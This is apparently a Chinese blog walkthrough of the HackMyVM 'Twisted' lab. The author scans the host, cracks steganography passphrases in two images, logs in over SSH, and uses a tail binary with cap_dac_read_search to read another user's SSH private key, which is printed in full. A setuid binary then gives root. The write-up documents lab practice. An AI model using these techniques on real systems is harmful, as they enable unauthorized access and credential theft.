guayu-kakeru
0%

HMV-Twisted

发表于 更新于 分类于

HMV-Twisted靶场复盘

端口扫描

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
┌──(root㉿kakeru)-[~/tmp]
└─# nmap -A 192.168.240.249  
Starting Nmap 7.95 ( https://nmap.org ) at 2025-01-31 19:26 CST
Nmap scan report for 192.168.240.249
Host is up (0.0018s latency).
Not shown: 998 closed tcp ports (reset)
PORT     STATE SERVICE VERSION
80/tcp   open  http    nginx 1.14.2
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: nginx/1.14.2
2222/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 67:63:a0:c9:8b:7a:f3:42:ac:49:ab:a6:a7:3f:fc:ee (RSA)
|   256 8c:ce:87:47:f8:b8:1a:1a:78:e5:b7:ce:74:d7:f5:db (ECDSA)
|_  256 92:94:66:0b:92:d3:cf:7e:ff:e8:bf:3c:7b:41:b7:5a (ED25519)
MAC Address: 76:50:9A:7A:10:0F (Unknown)
Device type: general purpose|router
Running: Linux 4.X|5.X, MikroTik RouterOS 7.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3
OS details: Linux 4.15 - 5.19, OpenWrt 21.02 (Linux 5.4), MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3)
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   1.77 ms 192.168.240.249

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.53 seconds

就开放了web和ssh
我们就去访问一下web有什么信息

web探测

web界面的内容:

1
2
3
4
5
6
7
8
9
┌──(root㉿kakeru)-[~/tmp]
└─# curl 192.168.240.249                            
<h1>I love cats!</h1> 
<img src="cat-original.jpg" alt="Cat original"  width="400" height="400"> 
<br>

<h1>But I prefer this one because seems different</h1>

<img src="cat-hidden.jpg" alt="Cat Hidden" width="400" height="400">

给了两张图片 图片的样子都一样 提示我们要找到两张照片的不同
先用diff比较两张图片

1
2
3
┌──(root㉿kakeru)-[~/tmp]
└─# diff cat-original.jpg cat-hidden.jpg 
Binary files cat-original.jpg and cat-hidden.jpg differ

返回是两个图片的二进制文件不同 尝试使用了binwalk分离文件但是没有效果
看了wp用了stegseek这个工具 学习起来 kali工具笔记

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
┌──(root㉿kakeru)-[~/tmp]
└─# stegseek -wl /usr/share/wordlists/rockyou.txt cat-original.jpg
StegSeek 0.6 - https://github.com/RickdeJager/StegSeek

[i] Found passphrase: "westlife"
[i] Original filename: "markus.txt".
[i] Extracting to "cat-original.jpg.out".

                                                                                                                    
┌──(root㉿kakeru)-[~/tmp]
└─# stegseek -wl /usr/share/wordlists/rockyou.txt cat-hidden.jpg  
StegSeek 0.6 - https://github.com/RickdeJager/StegSeek

[i] Found passphrase: "sexymama"
[i] Original filename: "mateo.txt".
[i] Extracting to "cat-hidden.jpg.out".

成功分离出文件

1
2
3
4
5
6
7
8
9
10
11
┌──(root㉿kakeru)-[~/tmp]
└─# ls
a.txt  cat-hidden.jpg  cat-hidden.jpg.out  cat-original.jpg  cat-original.jpg.out
                                                                                                                    
┌──(root㉿kakeru)-[~/tmp]
└─# cat cat-hidden.jpg.out                                                                            
thisismypassword
                                                                                                                    
┌──(root㉿kakeru)-[~/tmp]
└─# cat cat-original.jpg.out 
markuslovesbonita

得到一个密码 并且从这个密码可以推断用户名是 markus 登录到ssh中 

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
┌──(root㉿kakeru)-[~/tmp]
└─# ssh markus@192.168.240.249 -p 2222
The authenticity of host '[192.168.240.249]:2222 ([192.168.240.249]:2222)' can't be established.
ED25519 key fingerprint is SHA256:+Vy+50OqnmO0eOU2nhxE0uNjMjXrtpHTmrYtml4yF3s.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '[192.168.240.249]:2222' (ED25519) to the list of known hosts.
markus@192.168.240.249's password: 
Linux twisted 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2+deb10u1 (2020-06-07) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
markus@twisted:~$

成功拿到shell

提权

这个用户没有sudo命令权限 也没有可以利用的suid
这个用户下有一个note.txt

1
2
3
4
markus@twisted:~$ cat note.txt 
Hi bonita,
I have saved your id_rsa here: /var/cache/apt/id_rsa
Nobody can find it.

提示有一个用户叫做bonita 利用id_rsa文件登录到这个用户
现在没有权限读取这个文件
但是home目录下面找到两个其他用户的文件夹 

1
2
3
4
5
markus@twisted:/home$ ls
bonita  markus  mateo
markus@twisted:/home$ cd bonita/
markus@twisted:/home/bonita$ ls
beroot  user.txt

但是都没有权限 所以现在必须要找到利用id_rsa的办法
没有思路 看wp, 大佬用了getcap这个命令查看文件的权利 记录记录linux指令笔记

1
2
3
4
markus@twisted:~$ getcap / -r 2>/dev/null
markus@twisted:~$ /usr/sbin/getcap / -r 2>/dev/null
/usr/bin/ping = cap_net_raw+ep
/usr/bin/tail = cap_dac_read_search+ep

发现tail指令可以绕过文件的读和搜索权限 所以用tail指令获取id_rsa内容

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
markus@twisted:~$ tail -n 50 /var/cache/apt/id_rsa
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABFwAAAAdzc2gtcn
NhAAAAAwEAAQAAAQEA8NIseqX1B1YSHTz1A4rFWhjIJffs5vSbAG0Vg2iTa+xshyrmk6zd
FyguFUO7tN2TCJGTomDTXrG/KvWaucGvIAXpgV1lQsQkBV/VNrVC1Ioj/Fx3hUaSCC4PBS
olvmldJg2habNOUGA4EBKlTwfDi+vjDP8d77mF+rvA3EwR3vj37AiXFk5hBEsqr9cWeTr1
vD5282SncYtJb/Zx0eOa6VVFqDfOB7LKZA2QYIbfR7jezOdX+/nlDKX8Xp07wimFuMJpcF
gFnch7ptoxAqe0M0UIEzP+G2ull3m80G5L7Q/3acg14ULnNVs5dTJWPO2Fp7J2qKW+4A5C
tt0G5sIBpQAAA8hHx4cBR8eHAQAAAAdzc2gtcnNhAAABAQDw0ix6pfUHVhIdPPUDisVaGM
gl9+zm9JsAbRWDaJNr7GyHKuaTrN0XKC4VQ7u03ZMIkZOiYNNesb8q9Zq5wa8gBemBXWVC
xCQFX9U2tULUiiP8XHeFRpIILg8FKiW+aV0mDaFps05QYDgQEqVPB8OL6+MM/x3vuYX6u8
DcTBHe+PfsCJcWTmEESyqv1xZ5OvW8PnbzZKdxi0lv9nHR45rpVUWoN84HsspkDZBght9H
uN7M51f7+eUMpfxenTvCKYW4wmlwWAWdyHum2jECp7QzRQgTM/4ba6WXebzQbkvtD/dpyD
XhQuc1Wzl1MlY87YWnsnaopb7gDkK23QbmwgGlAAAAAwEAAQAAAQAuUW5GpLbNE2vmfbvu
U3mDy7JrQxUokrFhUpnJrYp1PoLdOI4ipyPa+VprspxevCM0ibNojtD4rJ1FKPn6cls5gI
mZ3RnFzq3S7sy2egSBlpQ3TJ2cX6dktV8kMigSSHenAwYhq2ALq4X86WksGyUsO1FvRX4/
hmJTiFsew+7IAKE+oQHMzpjMGyoiPXfdaI3sa10L2WfkKs4I4K/v/x2pW78HIktaQPutro
nxD8/fwGxQnseC69E6vdh/5tS8+lDEfYDz4oEy9AP26Hdtho0D6E9VT9T//2vynHLbmSXK
mPbr04h5i9C3h81rh4sAHs9nVAEe3dmZtmZxoZPOJKRhAAAAgFD+g8BhMCovIBrPZlHCu+
bUlbizp9qfXEc8BYZD3frLbVfwuL6dafDVnj7EqpabmrTLFunQG+9/PI6bN+iwloDlugtq
yzvf924Kkhdk+N366FLDt06p2tkcmRljm9kKMS3lBPMu9C4+fgo9LCyphiXrm7UbJHDVSP
UvPg4Fg/nqAAAAgQD9Q83ZcqDIx5c51fdYsMUCByLby7OiIfXukMoYPWCE2yRqa53PgXjh
V2URHPPhqFEa+iB138cSgCU3RxbRK7Qm1S7/P44fnWCaNu920iLed5z2fzvbTytE/h9QpJ
LlecEv2Hx03xyRZBsHFkMf+dMDC0ueU692Gl7YxRw+Lic0PQAAAIEA82v3Ytb97SghV7rz
a0S5t7v8pSSYZAW0OJ3DJqaLtEvxhhomduhF71T0iw0wy8rSH7j2M5PGCtCZUa2/OqQgKF
eERnqQPQSgM0PrATtihXYCTGbWo69NUMcALah0gT5i6nvR1Jr4220InGZEUWHLfvkGTitu
D0POe+rjV4B7EYkAAAAOYm9uaXRhQHR3aXN0ZWQBAgMEBQ==
-----END OPENSSH PRIVATE KEY-----
1
2
3
4
5
┌──(root㉿kakeru)-[~/tmp]
└─# chmod 600 id_rsa
                                                                                                                    
┌──(root㉿kakeru)-[~/tmp]
└─# ssh bonita@192.168.240.249 -p 2222 -i id_rsa

成功拿到bonita的shell
目录下面有一个程序

1
2
3
4
bonita@twisted:~$ file beroot 
beroot: setuid, setgid ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=fecfbde059505a54f66d3229cc9ebb78f997a7ba, not stripped
bonita@twisted:~$ ./beroot 
Enter the code:

下载到本地用ida查看

看到code密码是5880
然后就可以拿到root的shell

1
2
3
4
5
6
7
8
9
10
11
12
bonita@twisted:~$ ./beroot 
Enter the code:
 5880
root@twisted:~# ls
beroot  user.txt
root@twisted:~# cdd /root
bash: cdd: command not found
root@twisted:~# cd /root
root@twisted:/root# ls
root.txt
root@twisted:/root# cat root.txt 
HMVwhereismycat

结束

总结:难点在于1.怎么从两张图片中获得密码 2.如何从第一个shell拿到id_rsa 3.如何利用beroot这个程序
新知识:stegseek图片隐写工具 /usr/bin/getcap 权限查看 ida按tap快捷键看源码